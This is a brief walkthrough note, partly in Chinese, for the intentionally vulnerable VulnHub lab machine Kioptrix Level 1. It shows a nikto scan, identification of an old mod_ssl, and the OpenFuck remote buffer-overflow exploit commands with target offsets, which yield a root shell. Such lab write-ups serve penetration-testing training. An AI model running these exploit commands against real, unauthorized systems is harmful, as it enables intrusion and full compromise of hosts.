# Target complete - Kioptrix: Level 1 Download URL: https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ ## Step: {%hackmd FEwWUB_uQXiEWEj9MsaEgA %} 3. `$nikto -h http://<IP> > nikto_result.txt` * `$cat nikto_result.txt | grep cve` * 發現 mod_ssl/2.8.4 4. 至 exploit-db 搜尋 Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2) * https://github.com/heltonWernik/OpenLuck *  5. ./Openfuck * 因為先前用 nikto 掃出 apache 為 1.3.20 版本，所以是 Openfuck 這二個選項 6. ./Openfuck target box [port] [-c N] * ./Openfuck 0x6a 172.20.10.5 443 -c 40 * 失敗，改掃 0x6b *  * ./Openfuck 0x6b 172.20.10.5 443 -c 40 * 成功，取得 root ## Writeup 參考: * https://resdoss.blogspot.com/2019/03/kioptrix-level-1-1-ctf.html ###### tags: `target` `OSCP`